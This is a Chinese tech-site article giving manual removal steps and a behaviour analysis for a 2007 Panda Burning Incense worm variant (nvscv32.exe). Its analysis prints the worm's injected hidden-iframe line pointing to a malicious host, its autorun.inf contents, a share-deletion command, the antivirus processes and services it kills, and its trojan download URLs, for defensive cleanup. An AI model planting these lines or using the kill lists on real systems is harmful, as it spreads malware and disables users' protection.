熊猫烧香病毒nvscv32.exe变种手动清除方案

编者按：PConline提供了一种针对熊猫烧香病毒nvscv32.exe变种的查杀办法。据调查此变种于16日出现。笔者有幸于17日与“熊猫烧香病毒nvscv32.exe变种”亲密接触，并用以下方法将其清除。推荐使用第一种方法。

相关链接：
《熊猫烧香病毒专杀及手动修复方案》——适合病毒进程为：spoclsv.exe和FuckJacks.exe的读者。此文的病毒进程为：nvscv32.exe

一、PConline提供的解决方案

　　1.拔网线；

　　2.重新进入WinXP安全模式，熊猫烧香病毒进程没有加载，可使用“任务管理器”！（提示：开机后按住F8）

　　3.删除病毒文件：%SystemRoot%\system32\drivers\nvscv32.exe。

　　4.开始菜单=>运行，运行msconfig命令。在“系统配置实用程序”中，取消与nvscv32.exe相关的进程。也可使用超级兔子魔法设置、HijackThis等，删除nvscv32.exe的注册表启动项。

取消熊猫烧香病毒进程的启动

　　5.下载并使用江民专杀工具，修复被感染的exe文件。并及时打上Windows补丁。

　　6.清除html/asp/php等，所有网页文件中如下代码：（为防止传播代码有三处修改，请将“。”换为“.”）

　　<iframe src=http://www。krvkr。com/worm。htm width=”0” height=”0”></iframe>

　　批量清除恶意代码的方法：

• 　　可使用Dreamweaver的批量替换。

Dreamweaver批理替换的使用方法

• 　　可下载使用BatchTextReplacer批量替换。
• 　　部署了Symantec AntiVirus的企业，升级到最新病毒库扫描全盘文件，即可清除被添加的恶意代码和清除病毒文件。

　　7.用安装杀毒软件，并升级病毒库，扫描整个硬盘，清除其他病毒文件。推荐PConline多次推荐的“免费卡巴斯基”——Active Virus Sheild。（xxxxxxxxxxxxx）（注：步骤7不能与步骤5调换，以免可修复的带毒文件被删除！）

　　8.删除每个盘根目录下的autorun.inf文件，利用搜索功能，将Desktop_.ini全部删除。

二、互联安全网提供的解决方法（后文的病毒描述、中毒现象和技术分析均来自互联安全网）

　　1：关闭网络共享，断开网络。

　　2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前）

　　3：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
　　Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1

　　4：删除注册表启动项

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]

　　nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

　　5：删除C:\WINDOWS\system32\drivers\nvscv32.exe

　　6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。

　　7：如果电脑上有脚本文件，将病毒代码全部删除。

　　8：关闭系统的自动播放功能。

　　这样就基本上将病毒清除了。

三、病毒描述

　　含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。

　　文件名称：nvscv32.exe
　　病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商）
　　中文名称：（尼姆亚，熊猫烧香）
　　病毒大小：68,570 字节
　　编写语言：Borland Delphi 6.0 - 7.0
　　加壳方式：FSG 2.0 -> bart/xt
　　发现时间：2007.1.16
　　危害等级：高

四、中毒现象

　　1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。

　　2：无法手工修改“文件夹选项”将隐藏文件显示出来。

　　3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16

　　4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>

　　5：中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。

　　6：不能正常使用任务管理器，SREng.exe等工具。

　　7：无故的向外发包，连接局域网中其他机器。

五、技术分析

　　1：病毒文件运行后，将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe

　　建立注册表自启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]

　　nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

　　2：查找反病毒窗体病毒结束相关进程：

• 　　天网防火墙
• 　　virusscan
• 　　symantec antivirus
• 　　system safety monitor
• 　　system repair engineer
• 　　wrapped gift killer
• 　　游戏木马检测大师
• 　　超级巡警

　　3：结束以下进程

• 　　mcshield.exe
• 　　vstskmgr.exe
• 　　naprdmgr.exe
• 　　updaterui.exe
• 　　tbmon.exe
• 　　scan32.exe
• 　　ravmond.exe
• 　　ccenter.exe
• 　　ravtask.exe
• 　　rav.exe
• 　　ravmon.exe
• 　　ravmond.exe
• 　　ravstub.exe
• 　　kvxp.kxp
• 　　kvmonxp.kxp
• 　　kvcenter.kxp
• 　　kvsrvxp.exe
• 　　kregex.exe
• 　　uihost.exe
• 　　trojdie.kxp
• 　　frogagent.exe
• 　　kvxp.kxp
• 　　kvmonxp.kxp
• 　　kvcenter.kxp
• 　　kvsrvxp.exe
• 　　kregex.exe
• 　　uihost.exe
• 　　trojdie.kxp
• 　　frogagent.exe
• 　　logo1_.exe
• 　　logo_1.exe
• 　　rundl132.exe
• 　　taskmgr.exe
• 　　msconfig.exe
• 　　regedit.exe
• 　　sreng.exe 

　　4：禁用下列服务

• 　　schedule
• 　　sharedaccess
• 　　rsccenter
• 　　rsravmon
• 　　rsccenter
• 　　kvwsc
• 　　kvsrvxp
• 　　kvwsc
• 　　kvsrvxp
• 　　kavsvc
• 　　avp
• 　　avp
• 　　kavsvc
• 　　mcafeeframework
• 　　mcshield
• 　　mctaskmanager
• 　　mcafeeframework
• 　　mcshield
• 　　mctaskmanager
• 　　navapsvc
• 　　wscsvc
• 　　kpfwsvc
• 　　sndsrvc
• 　　ccproxy
• 　　ccevtmgr
• 　　ccsetmgr
• 　　spbbcsvc
• 　　symantec core lc
• 　　npfmntor
• 　　mskservice
• 　　firesvc

　　5：删除下列注册表项：

• 　　software\microsoft\windows\currentversion\run\ravtask
• 　　software\microsoft\windows\currentversion\run\kvmonxp
• 　　software\microsoft\windows\currentversion\run\kav
• 　　software\microsoft\windows\currentversion\run\kavpersonal50
• 　　software\microsoft\windows\currentversion\run\mcafeeupdaterui
• 　　software\microsoft\windows\currentversion\run\network associates error reporting service
• 　　software\microsoft\windows\currentversion\run\shstatexe
• 　　software\microsoft\windows\currentversion\run\ylive.exe
• 　　software\microsoft\windows\currentversion\run\yassistse

　　6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了）

　　7：跳过下列目录:

• 　　windows
• 　　winnt
• 　　systemvolumeinformation
• 　　recycled
• 　　windowsnt
• 　　windowsupdate
• 　　windowsmediaplayer
• 　　outlookexpress
• 　　netmeeting
• 　　commonfiles
• 　　complusapplications
• 　　commonfiles
• 　　messenger
• 　　installshieldinstallationinformation
• 　　msn
• 　　microsoftfrontpage
• 　　moviemaker
• 　　msngaminzone

　　8：删除*.gho备份文件。

　　9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统。

　　autorun.inf内容：

　　[AutoRun]
　　OPEN=setup.exe
　　shellexecute=setup.exe
　　shell\Auto\command=setup.exe

　　10：删除共享：cmd.exe /c net share admin$ /del /y

　　11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。

　　12：扫描局域网机器，一旦发现漏洞，就迅速传播。

　　13：在后台访问http：//www。whboy。net/update/wormcn。txt，根据下载列表下载其他病毒。

　　目前下载列表如下：（为防止病毒，将“.”改为了“。”）

• 　　http://www。krvkr。com/down/cq.exe
• 　　http://www。krvkr。com/down/mh.exe
• 　　http://www。krvkr。com/down/my.exe
• 　　http://www。krvkr。com/down/wl.exe
• 　　http://www。krvkr。com/down/rx.exe
• 　　http://www。krvkr。com/down/wow.exe
• 　　http://www。krvkr。com/down/zt.exe
• 　　http://www。krvkr。com/down/wm.exe
• 　　http://www。krvkr。com/down/dj.exe
• 　　http://www。krvkr。com/cn/iechajian.exe

　　到此病毒行为分析完毕。